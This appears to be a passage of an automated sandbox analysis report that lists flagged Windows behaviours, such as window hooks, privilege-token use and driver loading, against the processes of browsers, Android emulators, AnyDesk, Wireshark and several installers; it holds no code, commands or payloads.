N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe N/A
N/A N/A C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe N/A
N/A N/A C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Windows\system32\mmc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe N/A
N/A N/A C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe N/A
N/A N/A C:\Program Files\Wireshark\Wireshark.exe N/A
N/A N/A F:\BlueStacks X\BlueStacks X.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\fltmc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\driverconfig.exe N/A
N/A N/A C:\Windows\system32\mmc.exe N/A
N/A N/A C:\Windows\system32\mmc.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnuninst.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\NetLwfUninstall.exe N/A
N/A N/A C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Program Files\Wireshark\vc_redist.x64.exe N/A
N/A N/A C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe N/A
N/A N/A C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
N/A N/A C:\Program Files\Wireshark\npcap-1.78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\NPFInstall.exe N/A
N/A N/A C:\Program Files\Npcap\NPFInstall.exe N/A
N/A N/A C:\Program Files\Npcap\NPFInstall.exe N/A
N/A N/A C:\Program Files\Npcap\NPFInstall.exe N/A
N/A N/A C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yx4yle0s.exe N/A
N/A N/A C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe N/A
N/A N/A C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe N/A
